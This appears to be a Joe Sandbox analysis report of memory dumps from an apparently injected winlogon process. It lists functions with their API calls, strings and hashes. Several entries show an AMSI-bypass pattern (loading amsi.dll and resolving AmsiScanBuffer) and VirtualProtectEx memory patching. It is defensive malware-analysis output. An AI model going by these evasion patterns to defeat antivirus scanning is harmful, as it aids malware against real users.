Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 127a490b207412094bdf773d7bc7f314ed27483ed9a8622cdd057b0091c70391
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: C8F0BE72B44B8881FA058B13B8045A97221BF48FC8FC5D430FE0A07B28CE39D54383C6

Function 000001CA7D1EB904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001CA7D1EB929
GetProcAddress.KERNEL32 ref: 000001CA7D1EB93F
FreeLibrary.KERNEL32 ref: 000001CA7D1EB95B

Strings

CorExitProcess, xrefs: 000001CA7D1EB938
mscoree.dll, xrefs: 000001CA7D1EB920

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: c75c0d1d0a7dfc333aa3dd880c92edac9d32d090e86cc0fd6d0cdfce16583c4f
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 91F09673A4270981FB118B14D854B997720FF45769FD40319DA69451E8CF2EC548C383

Function 000001CA7D1E3708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000001CA7D1E275A), ref: 000001CA7D1E372A
StrCpyW.SHLWAPI ref: 000001CA7D1E373A
StrCatW.SHLWAPI ref: 000001CA7D1E3746
PathCombineW.SHLWAPI(?,?,00000000,000001CA7D1E275A), ref: 000001CA7D1E3754

Strings

\\.\pipe\, xrefs: 000001CA7D1E3720

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: c82dd5a25fec972a5fbc4a73daeaf237b653ae254e79d6f593719484f7f8d2f0
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 90F08276F45B9881FA058B17F9245997661BF48FC9FC88430EE4A07B58CF2DC5458783

Function 000001CA7D291E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 000001CA7D291E47
GetProcAddress.KERNEL32 ref: 000001CA7D291E57
Sleep.KERNEL32 ref: 000001CA7D291E67

Strings

AmsiScanBuffer, xrefs: 000001CA7D291E50
amsi.dll, xrefs: 000001CA7D291E40

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 2907fe888d2c04c09e7fe008df7f310d9433daeb94394008bd5d98f7c7cdab68
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: B4D04C36E91708A5F90B6B11D854BA73262FFD4B49FC40415890A193649E2EC55A93D3

Function 000001CA7D211E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 000001CA7D211E47
GetProcAddress.KERNEL32 ref: 000001CA7D211E57
Sleep.KERNEL32 ref: 000001CA7D211E67

Strings

amsi.dll, xrefs: 000001CA7D211E40
AmsiScanBuffer, xrefs: 000001CA7D211E50

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 7246112f9244b4226b796b0cd794045831b2067abd02715776a67b51b8a182b6
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 2ED0EC32E9170881F90B6B00DC54B9432217F94B18FC18018950A012649E3ED54A93DB

Function 000001CA7D295810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001CA7D295896

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 99275fefa3e122d711dffe7bf7ab3ffa9f0cd8fb82334eb92c6249ce1198314e
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: C1021A33659B8886E761CB15F49079AB7A0F7C4788F500015EACE97BA8DF7DC485CB82

Function 000001CA7D215810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001CA7D215896

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: aa8ac499eb692d5db1208b44326d97ecb6e913e81b2b611b9ce91f482cf527ce
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 5302FD33658B8486E761CB19F49079AB7B0F7C4798F504019EA8E47BA8DF7EC445CB82

Function 000001CA7D292C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001CA7D292CAD
TlsGetValue.KERNEL32 ref: 000001CA7D292CBC
TlsGetValue.KERNEL32 ref: 000001CA7D292CCB
TlsSetValue.KERNEL32 ref: 000001CA7D292E0F
TlsSetValue.KERNEL32 ref: 000001CA7D292E1E
TlsSetValue.KERNEL32 ref: 000001CA7D292E2D

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: 6a2463f9efe1ef2445148160494f6b45801955cb1664d84a517ab5a6c6691788
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: DD51AF37B5470987F326CB16A440EAA73A1FF88B89FD140199D5A53B54DB3AC8068BD3

Function 000001CA7D212C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001CA7D212CAD
TlsGetValue.KERNEL32 ref: 000001CA7D212CBC
TlsGetValue.KERNEL32 ref: 000001CA7D212CCB
TlsSetValue.KERNEL32 ref: 000001CA7D212E0F
TlsSetValue.KERNEL32 ref: 000001CA7D212E1E
TlsSetValue.KERNEL32 ref: 000001CA7D212E2D

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: f376f59fa2a11924f07aeae0f4e24fca5b39dbef64f999cd2058c410ead475d3
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 04518F37B4470987F366CB15E441E9AB3A4FF88B58F908119AD5A43794DB3BD8068BC3

Function 000001CA7D292AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001CA7D292AE1
TlsGetValue.KERNEL32 ref: 000001CA7D292AF0
TlsGetValue.KERNEL32 ref: 000001CA7D292AFF
TlsSetValue.KERNEL32 ref: 000001CA7D292C3B
TlsSetValue.KERNEL32 ref: 000001CA7D292C4A
TlsSetValue.KERNEL32 ref: 000001CA7D292C59

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 3378145a71404300d070cab9fed9048c8f8061d59c9752aa83fb82bf50c4289a
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 8851A133A547098AF326CF16A450EAA73A5FF88B89FD10018DD4A13754DB7AC8078BC3

Function 000001CA7D212AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001CA7D212AE1
TlsGetValue.KERNEL32 ref: 000001CA7D212AF0
TlsGetValue.KERNEL32 ref: 000001CA7D212AFF
TlsSetValue.KERNEL32 ref: 000001CA7D212C3B
TlsSetValue.KERNEL32 ref: 000001CA7D212C4A
TlsSetValue.KERNEL32 ref: 000001CA7D212C59

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 9e5fd35e134bb6201940a3d8bb8db161ac21b1b241632d42dbc14525f9094f05
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 7E518233B54705CBF726CF15A440A9A73A4FF84B88F808119AE4A43754DB3AD906C7C3

Function 000001CA7D1E2AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001CA7D1E2AE1
TlsGetValue.KERNEL32 ref: 000001CA7D1E2AF0
TlsGetValue.KERNEL32 ref: 000001CA7D1E2AFF
TlsSetValue.KERNEL32 ref: 000001CA7D1E2C3B
TlsSetValue.KERNEL32 ref: 000001CA7D1E2C4A
TlsSetValue.KERNEL32 ref: 000001CA7D1E2C59

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 8dc7a5a5a748a40cbc29a5a267432368ed8bc244d7968494e66c256cbaf93485
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 2C519333B547098BF726CF15E850E9973A0FB88B89F804159DD4A43754EB3AC945CB83

Function 000001CA7D295E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001CA7D295E66

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: ea16a1a7a1a17f6f263131a3a1cfce36d3cacf334bdce0e67c9e7c118ef6d97e
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: 70610C33A58B4886F762CB15E540B5AB7E0F789789F900115EACD53BA8DB7AC441CF82

Function 000001CA7D215E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001CA7D215E66

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 613c8c001a099c7bb1652f2b5ad2a82541488477a47cebf72ef6da64e55ba237
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: 1B61DA33968B48C6F761CF19E440B5AB7A5F788748F904119EA8D43BA8DB7AC541CB82

Function 000001CA7D1E5E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001CA7D1E5E66

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f37e1c6386c44249f93e7a8c8070b12ec0e492f56422c91e1d25021c4f6724ae
Instruction ID: fa9a5d2907fee9bc4b961baced023eb20950943a2e523218285e0907ba0ddb00
Opcode Fuzzy Hash: f37e1c6386c44249f93e7a8c8070b12ec0e492f56422c91e1d25021c4f6724ae
Instruction Fuzzy Hash: 1F61F633969B4886F761CB15E550B9AB7E0FB88749F900115FA8D43BA8DB3EC540CB83

Function 000001CA7D293EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001CA7D293A5B), ref: 000001CA7D293EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D293A5B), ref: 000001CA7D293F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001CA7D293A5B), ref: 000001CA7D293F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D293A5B), ref: 000001CA7D293F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001CA7D293A5B), ref: 000001CA7D293F68

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: a3441327fd192ba05e1bd0321bbdf2938bb54ef04919ac3b85a9ec6d852f5b6a
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 0F114F36A0874493FB258B21E40464B7770FB88B88F440026DE5D07758EB7EC94587C2

Function 000001CA7D213EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001CA7D213A5B), ref: 000001CA7D213EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D213A5B), ref: 000001CA7D213F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001CA7D213A5B), ref: 000001CA7D213F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D213A5B), ref: 000001CA7D213F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001CA7D213A5B), ref: 000001CA7D213F68

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: d868ca04b8d8586f6f6a390e290e58150676275038ac38a85c7b80935c32969b
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: DE115137A0874483FB258B21E4046497771FF48B98F44402AEA4D03758EB7ED545C7CA

Function 000001CA7D298CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001CA7D298CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001CA7D298D62
RtlUnwindEx.NTDLL ref: 000001CA7D298DBC

Strings

csm, xrefs: 000001CA7D298D49

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: f525cb24ccabdaef705eca32e391c6c3482e6c61b1592a8eb16db6a1036eaf3a
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 2151E273B417088AFB19CB25D054FADB391FB44B8DF984110EA9A57788DB7AC842C7C2

